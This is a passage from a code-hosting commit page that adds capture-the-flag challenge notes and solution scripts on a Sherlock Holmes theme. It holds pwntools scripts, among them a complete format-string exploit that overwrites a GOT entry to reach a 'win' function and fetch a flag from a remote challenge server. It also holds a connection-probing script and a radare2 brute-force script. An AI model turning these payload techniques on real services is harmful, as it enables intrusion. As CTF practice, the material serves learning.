Commit ef0a1b01 authored by Chris James's avatar Chris James

updated stuff

parent bfcf4d86
England would fall if Mrs. Hudson leaves Baker Street. Mrs. Hudson is the first one who is totally exploited by Sherlock, or Does She?
nc 146.185.168.172 54514
nc 178.62.249.106 54514
#!/usr/bin/env python2
from pwn import *
from IPython import embed
ips = ["146.185.168.172", "178.62.249.106"]
port = 54514
def log(message, sev=0):
msg = ""
if sev == 0:
msg += "[INFO] - "
if sev == 1:
msg += "[WARN] - "
if sev == 2:
msg += "[CRIT] - "
else:
msg += "\t"
msg += str(message)
print(msg)
def lengthTest(ip):
log("Length test on {}".format(ip))
maxLength = 2001
lengthStep = 100
log("maxLen: {}".format(maxLength))
log("lengthStep: {}".format(lengthStep))
for i in range(1, maxLength, lengthStep):
log("Connecting to: {}".format(ip), sev=1)
r = remote(ips[0], port)
log("number of bytes: {}".format(i))
log(r.readline())
log(r.send("\n"* i))
print(bytes(r.readline()))
r.close()
def main():
log("script starting")
lengthTest(ips[0])
embed()
if __name__ == "__main__":
main()
Lestrade is often frustrated by Sherlock's cryptic deductions and habit of withholding evidence, but believes that he is a great man. He has been easily exploited when Sherlock remembered his name properly.
nc 146.185.132.36 12431
return to 0x00400876 to win!
break on 0x00400afe for command input
break on 0x00400b34
read == 0x0040097d
printfGOT == 0x602040
printf == 0x00400a0c
buffer is 0x80 big, reads 0x3ff characters
#!/usr/bin/env python2
from pwn import *
from IPython import embed
DEBUG = True
target = 0x400876
if DEBUG:
p = process("./greg_lestrade")
else:
p = remote("146.185.132.36", 12431)
def wait():
sleep(0.2)
def log(message, sev=0):
msg = ""
if sev == 0:
msg += "[INFO] - "
elif sev == 1:
msg += "[WARN] - "
elif sev == 2:
msg += "[CRIT] - "
else:
msg += "\t"
msg += str(message)
print(msg.rstrip())
def main():
secret1 = "7h15_15_v3ry_53cr37_1_7h1nk"
log("Starting muh exploit...")
if DEBUG:
log("In debug mode, [enter] to continue...")
raw_input()
for i in range(3):
log(p.readline())
log("Sending secret #1...: {}".format(secret1))
p.sendline(secret1)
for i in range(2):
log(p.readline())
p.sendline("1")
p.readline()
log("What we have here is a failure to printf()...", sev=1)
#value i need to write to GOT (0x602040):
#writevalue = '400876'
#write in 2 halves:
#first clear out the lower half of GOT entry:
writeStr0 = "%72$n"
#now we write 2nd half of desired word, 0x0040:
writeStr1 = "%65123lx.%72$hn"
writeAddr1 = p64(0x602042)
#now we write first half of desired word, 0x0876
writeStr2 = "%2101lx.%73$hn"
writeAddr2 = p64(0x602040)
#now we construct our payload of the ages:
payload = 'a' * (0x1fe - len(writeStr0 + writeStr1 + writeStr2)) + writeStr0 + writeStr1 + writeStr2 + '\x0a\x00' + writeAddr1 + writeAddr2
log("Sending Payload!", sev=2)
log("LOOK AT THIS PAYLOAD: {}".format(payload), sev=2)
p.sendline(payload)
log("Triggering exploit...", sev=2)
p.sendline("1")
p.readline()
for i in range(3):
p.readline()
log("Retrieving flag...", sev=2)
print(p.readline())
if DEBUG:
embed()
p.close()
if __name__ == "__main__":
main()
#!/usr/bin/env python2
from pwn import *
from IPython import embed
DEBUG = False
target = 0x400876
if DEBUG:
p = process("./greg_lestrade")
else:
p = remote("146.185.132.36", 12431)
def wait():
sleep(0.2)
def log(message, sev=0):
msg = ""
if sev == 0:
msg += "[INFO] - "
if sev == 1:
msg += "[WARN] - "
if sev == 2:
msg += "[CRIT] - "
else:
msg += "\t"
msg += str(message)
print(msg.rstrip())
def main():
log("Starting muh exploit...")
if DEBUG:
raw_input()
for i in range(3):
log(p.readline())
log("Sending secret #1...")
p.sendline("7h15_15_v3ry_53cr37_1_7h1nk")
for i in range(2):
log(p.readline())
p.sendline("1")
p.readline()
#value i need to write to GOT (0x602040):
#writevalue = '400876'
#write in 2 halves
writeStr0 = "%72$n"
writeStr1 = "%65123lx.%72$hn"
writeAddr1 = p64(0x602042)
writeStr2 = "%2101lx.%73$hn"
writeAddr2 = p64(0x602040)
payload = 'a' * (0x1fe - len(writeStr0 + writeStr1 + writeStr2)) + writeStr0 + writeStr1 + writeStr2 + '\x0a\x00' + writeAddr1 + writeAddr2
log("Sending Payload...", sev=2)
p.sendline(payload)
#leak = ".%137$lx"
#p.send('a' * (0x1fe - len(leak)) + leak + '\n')
#output = p.readline()
#print(output)
#canary = output.split(".")[-1]
#log("Canary: {}".format(canary), sev=2)
p.sendline("1")
p.readline()
for i in range(3):
p.readline()
log("Retrieving flag...", sev=2)
print(p.readline())
if DEBUG:
embed()
p.close()
if __name__ == "__main__":
main()
File added
File added
0x400b77
victory string = 69fc8b9b1cdfe47e6b51a6804fc1dbddba1ea1d9
'deadbeefcafebabe' == b3220e079fe239a3dbf7d340eaee0d0af976f0ec
'0eadbeefcafebabe' == b3220e079fe239a3dbf7d340eaee0d0af976f0ec
'1eadbeefcafebabe' == b3220e079fe239a3dbf7d340eaee0d0af976f0ec
'1eadbeefcafe' == b3220e079fe239a3dbf7d340eaee0d0af976f0ec
'fffdbeefcfff' == b3220e079fe239a3dbf7d340eaee0d0af976f0ec
'dead0123cafebabe' == 6d6dbdd33bcef6f6fb4a0d91b9b27f164380f1fd
'0000beefcafebabe' == c263575659ca64329e99bbf8c37db27ef61a68e4
#!/usr/bin/env python3
from binascii import hexlify,unhexlify
import r2pipe
goal = '69fc8b9b1cdfe47e6b51a6804fc1dbddba1ea1d9'
def runProg(thing):
arg = '69fc'
arg += hex(thing)[2:].zfill(4)
arg += '69fd'
print("Trying with: {}".format(arg))
r2 = r2pipe.open("abc", ['-d'])
r2.cmd("ood {}".format(arg))
r2.cmd("db 0x400b77")
r2.cmd("dc")
output = r2.cmd("pr 40 @ rax")
print(output)
return output
def main():
#we try all 3-byte inputs until goal is reached
for thing in range(0xffff):
output = runProg(thing)
if output == goal:
break
print("we have a match!: {}".format(hexlify(thing)))
if __name__ == "__main__":
main()
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment